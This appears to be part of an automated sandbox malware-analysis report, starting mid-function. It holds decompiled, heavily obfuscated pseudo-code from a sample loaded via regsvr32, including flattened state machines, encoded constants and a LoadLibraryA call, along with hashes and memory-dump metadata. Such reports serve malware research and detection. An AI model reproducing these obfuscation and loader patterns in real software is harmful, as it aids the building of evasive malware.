                                                                                                                												E001B17D2(_v204, _v200, _t271);
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							L9:
                                                                                                                							return _t242;
                                                                                                                						}
                                                                                                                						_t271 = E001B7E3D( *((intOrPtr*)(_t243 + 4)), _v164,  *_t243, _v212);
                                                                                                                						__eflags = _t271;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_t243 = _v156;
                                                                                                                							_t272 = 0xe91fc15;
                                                                                                                							_t222 = 0xc1521a1;
                                                                                                                							goto L19;
                                                                                                                						} else {
                                                                                                                							_t272 = 0xc83c513;
                                                                                                                							goto L13;
                                                                                                                						}
                                                                                                                						goto L9;
                                                                                                                						L19:
                                                                                                                						__eflags = _t272 - 0xe91fc15;
                                                                                                                					} while (__eflags != 0);
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                			}












































                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (6$:V_+$CH$om$zk$M"$NS
                                                                                                                • API String ID: 0-135718759
                                                                                                                • Opcode ID: d98bbbc0968ecb03d0c0e54a2862376fa3d374a2662858f4db8f37b55471c0e2
                                                                                                                • Instruction ID: 8ac16dfd64102d11d0350c61ad4953e039af238087e1afa926df508a9025be2e
                                                                                                                • Opcode Fuzzy Hash: d98bbbc0968ecb03d0c0e54a2862376fa3d374a2662858f4db8f37b55471c0e2
                                                                                                                • Instruction Fuzzy Hash: 16B163725083809FD368CF61C48984BFBE1FBD4358F508A1DF5A696260D7B5C94ACF86
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001AC151(void* __ecx, void* __edx) {
                                                                                                                				signed int _v4;
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				void* _t194;
                                                                                                                				intOrPtr _t195;
                                                                                                                				intOrPtr _t199;
                                                                                                                				void* _t200;
                                                                                                                				signed int _t202;
                                                                                                                				signed int _t203;
                                                                                                                				signed int _t204;
                                                                                                                				signed int _t205;
                                                                                                                				void* _t227;
                                                                                                                				void* _t228;
                                                                                                                				signed int* _t231;
                                                                                                                				signed int* _t232;
                                                                                                                
                                                                                                                				_t231 =  &_v76;
                                                                                                                				_v36 = 0x8ff207;
                                                                                                                				_v36 = _v36 | 0x5faff7e6;
                                                                                                                				_v36 = _v36 ^ 0x5fad7a1e;
                                                                                                                				_v40 = 0x724753;
                                                                                                                				_v40 = _v40 >> 9;
                                                                                                                				_v40 = _v40 * 0x64;
                                                                                                                				_t227 = __edx;
                                                                                                                				_v40 = _v40 ^ 0x0015a104;
                                                                                                                				_v24 = 0x4bab46;
                                                                                                                				_t200 = __ecx;
                                                                                                                				_v24 = _v24 | 0x1433a485;
                                                                                                                				_t228 = 0x6ac6f9c;
                                                                                                                				_v24 = _v24 ^ 0x1475d613;
                                                                                                                				_v64 = 0x792d6f;
                                                                                                                				_v64 = _v64 >> 2;
                                                                                                                				_v64 = _v64 | 0x20efa489;
                                                                                                                				_t202 = 0x78;
                                                                                                                				_v64 = _v64 / _t202;
                                                                                                                				_v64 = _v64 ^ 0x00471cc7;
                                                                                                                				_v60 = 0xc13044;
                                                                                                                				_v60 = _v60 >> 6;
                                                                                                                				_v60 = _v60 << 6;
                                                                                                                				_v60 = _v60 + 0xffff33ed;
                                                                                                                				_v60 = _v60 ^ 0x00c7cab3;
                                                                                                                				_v20 = 0x4e66dd;
                                                                                                                				_v20 = _v20 << 6;
                                                                                                                				_v20 = _v20 ^ 0x1399b6d5;
                                                                                                                				_v52 = 0x1d7f55;
                                                                                                                				_t203 = 0x49;
                                                                                                                				_v52 = _v52 / _t203;
                                                                                                                				_t204 = 0x6b;
                                                                                                                				_v52 = _v52 / _t204;
                                                                                                                				_v52 = _v52 * 0x74;
                                                                                                                				_v52 = _v52 ^ 0x000aaa88;
                                                                                                                				_v32 = 0x4f41e6;
                                                                                                                				_v32 = _v32 + 0x58b2;
                                                                                                                				_v32 = _v32 + 0x6273;
                                                                                                                				_v32 = _v32 ^ 0x004c48d8;
                                                                                                                				_v56 = 0xc9fe5a;
                                                                                                                				_v56 = _v56 * 0x49;
                                                                                                                				_v56 = _v56 + 0xffffbb94;
                                                                                                                				_v56 = _v56 | 0x07a81756;
                                                                                                                				_v56 = _v56 ^ 0x3fbdf189;
                                                                                                                				_v68 = 0x194af6;
                                                                                                                				_v68 = _v68 >> 0xa;
                                                                                                                				_v68 = _v68 ^ 0x4c9b1680;
                                                                                                                				_v68 = _v68 ^ 0x2620a115;
                                                                                                                				_v68 = _v68 ^ 0x6ab08ab7;
                                                                                                                				_v44 = 0x1d64ff;
                                                                                                                				_v44 = _v44 | 0xbf79d3da;
                                                                                                                				_v44 = _v44 ^ 0xbf7734fb;
                                                                                                                				_v72 = 0x175686;
                                                                                                                				_v72 = _v72 + 0xbfd6;
                                                                                                                				_v72 = _v72 ^ 0x0e6cc914;
                                                                                                                				_v72 = _v72 ^ 0x3e6d5307;
                                                                                                                				_v72 = _v72 ^ 0x30179962;
                                                                                                                				_v76 = 0x87de1c;
                                                                                                                				_v76 = _v76 << 1;
                                                                                                                				_v76 = _v76 + 0x933;
                                                                                                                				_v76 = _v76 | 0x31435ae5;
                                                                                                                				_v76 = _v76 ^ 0x314ea78d;
                                                                                                                				_v8 = 0x8e8dd9;
                                                                                                                				_v8 = _v8 >> 0xf;
                                                                                                                				_v8 = _v8 ^ 0x000a07dd;
                                                                                                                				_v12 = 0xb8b805;
                                                                                                                				_v12 = _v12 >> 0xf;
                                                                                                                				_v12 = _v12 ^ 0x0003cc3f;
                                                                                                                				_v28 = 0x781e68;
                                                                                                                				_v28 = _v28 << 0xf;
                                                                                                                				_t205 = 0x4d;
                                                                                                                				_v28 = _v28 / _t205;
                                                                                                                				_v28 = _v28 ^ 0x003d4a7e;
                                                                                                                				_v16 = 0x5f2d35;
                                                                                                                				_t132 =  &_v16; // 0x5f2d35
                                                                                                                				_t206 = 0x14;
                                                                                                                				_v16 =  *_t132 / _t206;
                                                                                                                				_v16 = _v16 ^ 0x0000f2f8;
                                                                                                                				_v4 = 0x4b5f87;
                                                                                                                				_v4 = _v4 * 0x13;
                                                                                                                				_v4 = _v4 ^ 0x0595d5d6;
                                                                                                                				_v48 = 0xb975f8;
                                                                                                                				_v48 = _v48 | 0x33424d0e;
                                                                                                                				_v48 = _v48 * 0x3f;
                                                                                                                				_v48 = _v48 << 8;
                                                                                                                				_v48 = _v48 ^ 0xe409ad5d;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					_t194 = 0x2905f39;
                                                                                                                					do {
                                                                                                                						while(_t228 != _t194) {
                                                                                                                							if(_t228 == 0x6ac6f9c) {
                                                                                                                								_t228 = 0x6fd6f86;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								if(_t228 == 0x6fd6f86) {
                                                                                                                									_push(_v64);
                                                                                                                									_t195 = E001B3E89(_v36, _v40, __eflags, _v24, _t206, _t200);
                                                                                                                									_t232 =  &(_t231[4]);
                                                                                                                									 *((intOrPtr*)(_t227 + 0x14)) = _t195;
                                                                                                                									__eflags = _t195;
                                                                                                                									if(_t195 != 0) {
                                                                                                                										E001B9954(_t195, _t195, _v60, _v20);
                                                                                                                										_push( *((intOrPtr*)(_t227 + 0x14)));
                                                                                                                										_push(_v56);
                                                                                                                										_t206 = _v52;
                                                                                                                										E001A7013(_v52, _v32);
                                                                                                                										_t231 =  &(_t232[4]);
                                                                                                                										_t228 = 0xe0809d9;
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									if(_t228 == 0xabeb3a7) {
                                                                                                                										return E001C1BE6(_v4,  *((intOrPtr*)(_t227 + 0x14)), _v48);
                                                                                                                									}
                                                                                                                									if(_t228 != 0xe0809d9) {
                                                                                                                										goto L13;
                                                                                                                									} else {
                                                                                                                										_t206 = _v68;
                                                                                                                										_t199 = E001B6028(_v68, _v44, _v72, _v76,  *((intOrPtr*)(_t227 + 0x14)));
                                                                                                                										_t231 =  &(_t231[3]);
                                                                                                                										 *((intOrPtr*)(_t227 + 0xc)) = _t199;
                                                                                                                										_t194 = 0x2905f39;
                                                                                                                										_t228 =  !=  ? 0x2905f39 : 0xabeb3a7;
                                                                                                                										continue;
                                                                                                                									}
                                                                                                                									L17:
                                                                                                                								}
                                                                                                                							}
                                                                                                                							L16:
                                                                                                                							return _t195;
                                                                                                                							goto L17;
                                                                                                                						}
                                                                                                                						_t195 = E001B0231(_t227, _v8, _t227, E001B6E1B, _t227, _t206, _v12, _v28, _v16);
                                                                                                                						_t231 =  &(_t231[8]);
                                                                                                                						 *((intOrPtr*)(_t227 + 4)) = _t195;
                                                                                                                						__eflags = _t195;
                                                                                                                						if(_t195 == 0) {
                                                                                                                							_t228 = 0xabeb3a7;
                                                                                                                							_t194 = 0x2905f39;
                                                                                                                							goto L13;
                                                                                                                						}
                                                                                                                						goto L16;
                                                                                                                						L13:
                                                                                                                						__eflags = _t228 - 0x5387d9c;
                                                                                                                					} while (__eflags != 0);
                                                                                                                					return _t194;
                                                                                                                				}
                                                                                                                			}


































                                                                                                                0x001ac4ad
                                                                                                                0x001ac4b0
                                                                                                                0x001ac4b3
                                                                                                                0x001ac4b5
                                                                                                                0x001ac4b7
                                                                                                                0x001ac4b9
                                                                                                                0x00000000
                                                                                                                0x001ac4b9
                                                                                                                0x00000000
                                                                                                                0x001ac4be
                                                                                                                0x001ac4be
                                                                                                                0x001ac4be
                                                                                                                0x00000000
                                                                                                                0x001ac3d1

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 5-_$SGr$o-y$sb$~J=$AO$ZC1
                                                                                                                • API String ID: 0-1344538677
                                                                                                                • Opcode ID: f509f5554e4af19868a0712b6017788f8255f7294a61a6f276d4d2e68dfc5611
                                                                                                                • Instruction ID: a99aa39f10254f6ed4db8913b47128ac6dfd737d5814a6f926070edb9a9d6909
                                                                                                                • Opcode Fuzzy Hash: f509f5554e4af19868a0712b6017788f8255f7294a61a6f276d4d2e68dfc5611
                                                                                                                • Instruction Fuzzy Hash: 799130725083419FC348DF22D58A41BFBE1BBD9708F008A1DF5A9A6260D7B5DA09CF87
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 80%
                                                                                                                			E1002583F(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v284;
                                                                                                                				char _v288;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t9;
                                                                                                                				intOrPtr* _t18;
                                                                                                                				void* _t26;
                                                                                                                				void* _t27;
                                                                                                                				void* _t33;
                                                                                                                				signed int _t34;
                                                                                                                				void* _t35;
                                                                                                                				signed int _t36;
                                                                                                                				void* _t37;
                                                                                                                
                                                                                                                				_t33 = __edi;
                                                                                                                				_t32 = __edx;
                                                                                                                				_t26 = __ebx;
                                                                                                                				_t9 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v8 = _t9 ^ _t36;
                                                                                                                				_t39 = _a4 - 0x800;
                                                                                                                				_t35 = __ecx;
                                                                                                                				if(_a4 != 0x800) {
                                                                                                                					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
                                                                                                                					if(__eflags != 0) {
                                                                                                                						goto L2;
                                                                                                                					} else {
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					E1000B0F0(__ebx, __edi, _t35, E1003F11F(__edx,  &_v288, 4, "LOC"));
                                                                                                                					_t37 = _t37 + 0x10;
                                                                                                                					L2:
                                                                                                                					_push(_t26);
                                                                                                                					_push(_t33);
                                                                                                                					_t34 =  *(E1003D47E(_t39));
                                                                                                                					 *(E1003D47E(_t39)) =  *_t14 & 0x00000000;
                                                                                                                					_t35 = 0x112;
                                                                                                                					_t27 = E1003D617( &_v284, 0x112, 0x111, 0x112,  &_v288);
                                                                                                                					_t18 = E1003D47E(_t39);
                                                                                                                					_t40 =  *_t18;
                                                                                                                					if( *_t18 == 0) {
                                                                                                                						 *(E1003D47E(__eflags)) = _t34;
                                                                                                                					} else {
                                                                                                                						E10017114( *((intOrPtr*)(E1003D47E(_t40))));
                                                                                                                					}
                                                                                                                					if(_t27 == 0xffffffff || _t27 >= _t35) {
                                                                                                                						_t12 = 0;
                                                                                                                						__eflags = 0;
                                                                                                                					} else {
                                                                                                                						_t12 = LoadLibraryA( &_v284);
                                                                                                                					}
                                                                                                                					_pop(_t33);
                                                                                                                					_pop(_t26);
                                                                                                                				}
                                                                                                                				return E1003B437(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • _strcpy_s.LIBCMT ref: 1002586C
                                                                                                                  • Part of subcall function 1003D47E: __getptd_noexit.LIBCMT ref: 1003D47E
                                                                                                                • __snprintf_s.LIBCMT ref: 100258A5
                                                                                                                  • Part of subcall function 1003D617: __vsnprintf_s_l.LIBCMT ref: 1003D62C
                                                                                                                • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 100258D0
                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 100258F3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                • String ID: LOC
                                                                                                                • API String ID: 3864805678-519433814
                                                                                                                • Opcode ID: 5fa94b3df83eb69165c65857bbcdb0d87966c3e8da41a0faf5d7eb10fa7c61f5
                                                                                                                • Instruction ID: b361b73e61f3dc58a9df8e74141111329b382a9db3b2c6a5dbe71c1c9d46e873
                                                                                                                • Opcode Fuzzy Hash: 5fa94b3df83eb69165c65857bbcdb0d87966c3e8da41a0faf5d7eb10fa7c61f5
                                                                                                                • Instruction Fuzzy Hash: B211DA74900218AFD715EB74EC47BDD37A8DF04352F900176F615BB092DFB1AD458A64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E001C0A01(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				char _v60;
                                                                                                                				char _v96;
                                                                                                                				intOrPtr _v104;
                                                                                                                				intOrPtr _v112;
                                                                                                                				intOrPtr _v124;
                                                                                                                				intOrPtr _v128;
                                                                                                                				char _v132;
                                                                                                                				char _v140;
                                                                                                                				signed int _v144;
                                                                                                                				signed int _v148;
                                                                                                                				signed int _v152;
                                                                                                                				signed int _v156;
                                                                                                                				signed int _v160;
                                                                                                                				signed int _v164;
                                                                                                                				signed int _v168;
                                                                                                                				signed int _v172;
                                                                                                                				signed int _v176;
                                                                                                                				signed int _v180;
                                                                                                                				unsigned int _v184;
                                                                                                                				signed int _v188;
                                                                                                                				signed int _v192;
                                                                                                                				void* __ecx;
                                                                                                                				void* _t130;
                                                                                                                				signed int _t143;
                                                                                                                				signed int _t157;
                                                                                                                				void* _t162;
                                                                                                                				void* _t164;
                                                                                                                				intOrPtr _t172;
                                                                                                                				signed int _t189;
                                                                                                                				signed int _t190;
                                                                                                                				signed int _t191;
                                                                                                                				void* _t193;
                                                                                                                				void* _t194;
                                                                                                                				void* _t196;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t162 = __edx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				E001AC98A(_t130);
                                                                                                                				_v192 = 0xdf37dc;
                                                                                                                				_t194 = _t193 + 0x10;
                                                                                                                				_v192 = _v192 + 0xffffeae1;
                                                                                                                				_t189 = 0;
                                                                                                                				_t164 = 0x6cd3939;
                                                                                                                				_t190 = 0x2a;
                                                                                                                				_v192 = _v192 * 0x4c;
                                                                                                                				_v192 = _v192 * 0x15;
                                                                                                                				_v192 = _v192 ^ 0x6f13c0de;
                                                                                                                				_v160 = 0x784f70;
                                                                                                                				_t13 =  &_v160; // 0x784f70
                                                                                                                				_v160 =  *_t13 * 0x34;
                                                                                                                				_v160 = _v160 ^ 0x18721786;
                                                                                                                				_v172 = 0x9325c;
                                                                                                                				_t18 =  &_v172; // 0x9325c
                                                                                                                				_v172 =  *_t18 * 0x56;
                                                                                                                				_v172 = _v172 + 0xffff71a2;
                                                                                                                				_v172 = _v172 ^ 0x0316211e;
                                                                                                                				_v164 = 0x9c3fd5;
                                                                                                                				_v164 = _v164 * 0x47;
                                                                                                                				_v164 = _v164 ^ 0x2b51e95d;
                                                                                                                				_v168 = 0x9bd35b;
                                                                                                                				_v168 = _v168 + 0xffffef79;
                                                                                                                				_v168 = _v168 + 0xbf8a;
                                                                                                                				_v168 = _v168 ^ 0x009957ae;
                                                                                                                				_v148 = 0x8ba637;
                                                                                                                				_v148 = _v148 | 0x1e9c2665;
                                                                                                                				_v148 = _v148 ^ 0x1e93d5b7;
                                                                                                                				_v188 = 0xe809ca;
                                                                                                                				_t191 = _v164;
                                                                                                                				_v188 = _v188 / _t190;
                                                                                                                				_v188 = _v188 >> 8;
                                                                                                                				_v188 = _v188 ^ 0x138592b5;
                                                                                                                				_v188 = _v188 ^ 0x138d9402;
                                                                                                                				_v180 = 0xfc90aa;
                                                                                                                				_v180 = _v180 >> 0xf;
                                                                                                                				_v180 = _v180 | 0x91baf864;
                                                                                                                				_v180 = _v180 ^ 0x91b438e4;
                                                                                                                				_v144 = 0xc37b39;
                                                                                                                				_v144 = _v144 + 0xffff8c17;
                                                                                                                				_v144 = _v144 ^ 0x00c0553c;
                                                                                                                				_v176 = 0xac44bf;
                                                                                                                				_v176 = _v176 | 0x9fc88e1b;
                                                                                                                				_v176 = _v176 ^ 0x474a88ea;
                                                                                                                				_v176 = _v176 ^ 0xd8af2460;
                                                                                                                				_v184 = 0x82d85c;
                                                                                                                				_v184 = _v184 + 0x3dbf;
                                                                                                                				_v184 = _v184 >> 4;
                                                                                                                				_v184 = _v184 ^ 0x000675f8;
                                                                                                                				_v152 = 0x276e91;
                                                                                                                				_v152 = _v152 | 0x1063ef2a;
                                                                                                                				_v152 = _v152 ^ 0x106f66fa;
                                                                                                                				_v156 = 0x72565b;
                                                                                                                				_v156 = _v156 | 0x7da4a5d5;
                                                                                                                				_v156 = _v156 ^ 0x7dfea5eb;
                                                                                                                				while(1) {
                                                                                                                					_t196 = _t164 - 0x7dcd9e3;
                                                                                                                					if(_t196 > 0) {
                                                                                                                						goto L25;
                                                                                                                					}
                                                                                                                					L2:
                                                                                                                					if(_t196 == 0) {
                                                                                                                						_t172 =  *0x1c420c; // 0x67d5d8
                                                                                                                						_t189 = _t189 + 1;
                                                                                                                						__eflags = _t189;
                                                                                                                						_t117 = _t172 + 0x18; // 0x0
                                                                                                                						 *((intOrPtr*)(_t191 + 0x3c)) =  *_t117;
                                                                                                                						 *((intOrPtr*)(_t172 + 0x18)) = _t191;
                                                                                                                						L24:
                                                                                                                						_t164 = 0xa636d6d;
                                                                                                                						continue;
                                                                                                                						do {
                                                                                                                							while(1) {
                                                                                                                								_t196 = _t164 - 0x7dcd9e3;
                                                                                                                								if(_t196 > 0) {
                                                                                                                									goto L25;
                                                                                                                								}
                                                                                                                								goto L2;
                                                                                                                							}
                                                                                                                							L41:
                                                                                                                							__eflags = _t164 - 0x4e30ef0;
                                                                                                                						} while (_t164 != 0x4e30ef0);
                                                                                                                						L42:
                                                                                                                						return _t189;
                                                                                                                					}
                                                                                                                					if(_t164 == 0x49dcb06) {
                                                                                                                						_t143 = E001B2783(_v148, _v188, _v180,  &_v140, _v144,  &_v132);
                                                                                                                						_t194 = _t194 + 0x10;
                                                                                                                						asm("sbb ecx, ecx");
                                                                                                                						_t164 = ( ~_t143 & 0xfb301470) + 0xa636d6d;
                                                                                                                						while(1) {
                                                                                                                							_t196 = _t164 - 0x7dcd9e3;
                                                                                                                							if(_t196 > 0) {
                                                                                                                								goto L25;
                                                                                                                							}
                                                                                                                							goto L2;
                                                                                                                						}
                                                                                                                						goto L25;
                                                                                                                					}
                                                                                                                					if(_t164 == 0x51ea6f4) {
                                                                                                                						__eflags = _v128 - 1;
                                                                                                                						if(_v128 == 1) {
                                                                                                                							E001AD4BC( &_v96);
                                                                                                                							L12:
                                                                                                                							_t164 = 0x7dcd9e3;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						_t164 = 0x8635b5c;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					if(_t164 == 0x59381dd) {
                                                                                                                						_push(_t164);
                                                                                                                						_t191 = E001A303A(_t164, 0x4c);
                                                                                                                						_t194 = _t194 + 0xc;
                                                                                                                						__eflags = _t191;
                                                                                                                						if(_t191 == 0) {
                                                                                                                							L32:
                                                                                                                							_t164 = 0x49dcb06;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						_t164 = 0x51ea6f4;
                                                                                                                						 *((intOrPtr*)(_t191 + 0x38)) = _v104;
                                                                                                                						 *((intOrPtr*)(_t191 + 0x18)) = _v124;
                                                                                                                						 *((intOrPtr*)(_t191 + 0x2c)) = _v112;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					if(_t164 == 0x6c5751f) {
                                                                                                                						__eflags = _v128 - 4;
                                                                                                                						if(_v128 == 4) {
                                                                                                                							E001AAEBB( &_v96);
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                						_t164 = 0x7be19b3;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					if(_t164 == 0x6cd3939) {
                                                                                                                						E001A6DD9( &_v60, _v192, _v160, _t162, _v172);
                                                                                                                						_t194 = _t194 + 0xc;
                                                                                                                						_t164 = 0xd7453b1;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					if(_t164 != 0x7be19b3) {
                                                                                                                						goto L41;
                                                                                                                					}
                                                                                                                					if(_v128 == 5) {
                                                                                                                						E001A1A5F( &_v96, _t191);
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					_t164 = 0x904c6cc;
                                                                                                                					continue;
                                                                                                                					L25:
                                                                                                                					__eflags = _t164 - 0x842322b;
                                                                                                                					if(_t164 == 0x842322b) {
                                                                                                                						__eflags = _v128 - 3;
                                                                                                                						if(_v128 == 3) {
                                                                                                                							E001A958A( &_v96);
                                                                                                                							_t164 = 0x7dcd9e3;
                                                                                                                							goto L41;
                                                                                                                						}
                                                                                                                						_t164 = 0x6c5751f;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					__eflags = _t164 - 0x8635b5c;
                                                                                                                					if(_t164 == 0x8635b5c) {
                                                                                                                						__eflags = _v128 - 2;
                                                                                                                						if(_v128 == 2) {
                                                                                                                							E001AC151( &_v96, _t191);
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                						_t164 = 0x842322b;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					__eflags = _t164 - 0x904c6cc;
                                                                                                                					if(_t164 == 0x904c6cc) {
                                                                                                                						__eflags = _v128 - 6;
                                                                                                                						if(_v128 == 6) {
                                                                                                                							E001B9A0C( &_v96);
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					__eflags = _t164 - 0xa636d6d;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_t157 = E001AA903(_v164,  &_v140, __eflags, _v168,  &_v60);
                                                                                                                						__eflags = _t157;
                                                                                                                						if(_t157 == 0) {
                                                                                                                							goto L42;
                                                                                                                						}
                                                                                                                						goto L32;
                                                                                                                					}
                                                                                                                					__eflags = _t164 - 0xd7453b1;
                                                                                                                					if(_t164 != 0xd7453b1) {
                                                                                                                						goto L41;
                                                                                                                					}
                                                                                                                					E001B6E97(0);
                                                                                                                					goto L24;
                                                                                                                				}
                                                                                                                			}





































                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001c0bba
                                                                                                                0x001c0dd0
                                                                                                                0x001c0dd0
                                                                                                                0x001c0dd0
                                                                                                                0x001c0ddc
                                                                                                                0x001c0de8
                                                                                                                0x001c0de8
                                                                                                                0x001c0bcc
                                                                                                                0x001c0cdf
                                                                                                                0x001c0ce4
                                                                                                                0x001c0ceb
                                                                                                                0x001c0cf3
                                                                                                                0x001c0bb8
                                                                                                                0x001c0bb8
                                                                                                                0x001c0bba
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001c0bba
                                                                                                                0x00000000
                                                                                                                0x001c0bb8
                                                                                                                0x001c0bd8
                                                                                                                0x001c0ca6
                                                                                                                0x001c0cab
                                                                                                                0x001c0cbb
                                                                                                                0x001c0c1b
                                                                                                                0x001c0c1b
                                                                                                                0x00000000
                                                                                                                0x001c0c1b
                                                                                                                0x001c0cad
                                                                                                                0x00000000
                                                                                                                0x001c0cad
                                                                                                                0x001c0be4
                                                                                                                0x001c0c71
                                                                                                                0x001c0c7a
                                                                                                                0x001c0c7c
                                                                                                                0x001c0c7f
                                                                                                                0x001c0c81
                                                                                                                0x001c0d70
                                                                                                                0x001c0d70
                                                                                                                0x00000000
                                                                                                                0x001c0d70
                                                                                                                0x001c0c8b
                                                                                                                0x001c0c90
                                                                                                                0x001c0c97
                                                                                                                0x001c0c9e
                                                                                                                0x00000000
                                                                                                                0x001c0c9e
                                                                                                                0x001c0bec
                                                                                                                0x001c0c45
                                                                                                                0x001c0c4a
                                                                                                                0x001c0c5a
                                                                                                                0x00000000
                                                                                                                0x001c0c5a
                                                                                                                0x001c0c4c
                                                                                                                0x00000000
                                                                                                                0x001c0c4c
                                                                                                                0x001c0bf4
                                                                                                                0x001c0c33
                                                                                                                0x001c0c38
                                                                                                                0x001c0c3b
                                                                                                                0x00000000
                                                                                                                0x001c0c3b
                                                                                                                0x001c0bfc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001c0c07
                                                                                                                0x001c0c16
                                                                                                                0x00000000
                                                                                                                0x001c0c16
                                                                                                                0x001c0c09
                                                                                                                0x00000000
                                                                                                                0x001c0d18
                                                                                                                0x001c0d18
                                                                                                                0x001c0d1e
                                                                                                                0x001c0db4
                                                                                                                0x001c0db9
                                                                                                                0x001c0dc9
                                                                                                                0x001c0dce
                                                                                                                0x00000000
                                                                                                                0x001c0dce
                                                                                                                0x001c0dbb
                                                                                                                0x00000000
                                                                                                                0x001c0dbb
                                                                                                                0x001c0d24
                                                                                                                0x001c0d2a
                                                                                                                0x001c0d93
                                                                                                                0x001c0d98
                                                                                                                0x001c0daa
                                                                                                                0x00000000
                                                                                                                0x001c0daa
                                                                                                                0x001c0d9a
                                                                                                                0x00000000
                                                                                                                0x001c0d9a
                                                                                                                0x001c0d2c
                                                                                                                0x001c0d32
                                                                                                                0x001c0d7a
                                                                                                                0x001c0d7f
                                                                                                                0x001c0d89
                                                                                                                0x001c0d89
                                                                                                                0x00000000
                                                                                                                0x001c0d7f
                                                                                                                0x001c0d34
                                                                                                                0x001c0d3a
                                                                                                                0x001c0d65
                                                                                                                0x001c0d6c
                                                                                                                0x001c0d6e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001c0d6e
                                                                                                                0x001c0d3c
                                                                                                                0x001c0d42
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001c0d4a
                                                                                                                0x00000000
                                                                                                                0x001c0d4a

                                                                                                                Strings
                                                                                                                Memory Dump Source
